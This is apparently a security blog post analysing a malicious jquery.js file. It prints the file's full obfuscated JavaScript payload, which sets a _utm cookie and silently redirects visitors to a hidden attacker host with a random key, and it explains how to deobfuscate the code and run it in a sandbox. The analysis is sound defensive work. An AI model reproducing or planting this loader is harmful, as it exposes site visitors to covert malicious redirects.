2021. 2. 26. 01:31 · Information Security / Packet Forensics
Change the extension of jquery.js to jquery.log and open it to check the contents (as a .log file it opens as plain text and is not treated as a script). The file is named after jQuery but begins with Underscore's license comment, and everything after that comment is one obfuscated line:
// Underscore may be freely distributed under the MIT license.
var _0x72a8=["","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x63\x68\x61\x72\x41\x74","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67","\x3B\x20\x70\x61\x74\x68\x3D","\x69\x6E\x64\x65\x78\x4F\x66","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x3B","\x63\x6F\x6F\x6B\x69\x65\x45\x6E\x61\x62\x6C\x65\x64","\x5F\x75\x74\x6D","\x31","\x2F","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x3A\x2F\x2F","\x2E","\x69\x6E\x64\x65\x78","\x2E\x70\x68\x70\x3F\x6B\x65\x79\x3D"];function makeid(){var _0xb524x2=_0x72a8[0];var _0xb524x3=_0x72a8[1];for(var _0xb524x4=0;_0xb524x4< 32;_0xb524x4++){_0xb524x2+= _0xb524x3[_0x72a8[5]](Math[_0x72a8[4]](Math[_0x72a8[2]]()* _0xb524x3[_0x72a8[3]]))};return _0xb524x2}function _mmm_(_0xb524x6,_0xb524x7,_0xb524x8,_0xb524x9){var _0xb524xa= new Date();var _0xb524xb= new Date();if(_0xb524x8=== null|| _0xb524x8=== 0){_0xb524x8= 2};_0xb524xb[_0x72a8[7]](_0xb524xa[_0x72a8[6]]()+ 3600000* 24* _0xb524x8);document[_0x72a8[8]]= _0xb524x6+ _0x72a8[9]+ escape(_0xb524x7)+ _0x72a8[10]+ _0xb524xb[_0x72a8[11]]()+ ((_0xb524x9)?_0x72a8[12]+ _0xb524x9:_0x72a8[0])}function _nnn_(_0xb524xd){var _0xb524xe=document[_0x72a8[8]][_0x72a8[13]](_0xb524xd+ _0x72a8[9]);var _0xb524xf=_0xb524xe+ _0xb524xd[_0x72a8[3]]+ 1;if((!_0xb524xe) && (_0xb524xd!= document[_0x72a8[8]][_0x72a8[14]](0,_0xb524xd[_0x72a8[3]]))){return null};if(_0xb524xe== -1){return null};var _0xb524x10=document[_0x72a8[8]][_0x72a8[13]](_0x72a8[15],_0xb524xf);if(_0xb524x10== -1){_0xb524x10= document[_0x72a8[8]][_0x72a8[3]]};return unescape(document[_0x72a8[8]][_0x72a8[14]](_0xb524xf,_0xb524x10))}var 
s=_0x72a8[1];if(navigator[_0x72a8[16]]){if(_nnn_(_0x72a8[17])== 1){}else {_mmm_(_0x72a8[17],_0x72a8[18],_0x72a8[18],_0x72a8[19]);window[_0x72a8[21]][_0x72a8[20]]= s[33]+ s[45]+ s[45]+ s[41]+ _0x72a8[22]+ s[53]+ s[60]+ s[57]+ _0x72a8[23]+ s[53]+ s[56]+ s[55]+ _0x72a8[23]+ s[54]+ s[54]+ s[53]+ _0x72a8[23]+ s[53]+ s[56]+ _0x72a8[19]+ _0x72a8[24]+ _0x72a8[25]+ makeid()}}
To make this readable, paste the script into the site below, which turns it back into ordinary JavaScript:
de4js, JavaScript Deobfuscator and Unpacker: lelinhtinh.github.io
The important part of this code is the if block at the end. When navigator.cookieEnabled is true and the _utm cookie is not already 1, it sets _utm=1 (path=/, expiring one day later) and then assigns window.location.href, redirecting the browser to http:// ~~~ /index.php?key= ~~.
Note how the target is hidden: the host is never written as a string but assembled one character at a time from the alphabet/digit table (s[33]+s[45]+s[45]+s[41] spells "http", the digits of the address follow the same way), and the key is the 32-character random string returned by makeid(), so every victim requests a unique URL. The cookie makes the redirect fire only once per browser per day; if you reload the page to reproduce it, nothing happens until you delete _utm.
Save the code as an .html file (wrapped in <script> tags, otherwise the browser renders it as text instead of running it) and analyze it on an online dynamic malware analysis service. Two caveats: the sandbox really will contact the redirect host, and submissions made with a free account are visible to other users, including the attacker.
Free Automated Malware Analysis Service, powered by Falcon Sandbox (Hybrid Analysis): www.hybrid-analysis.com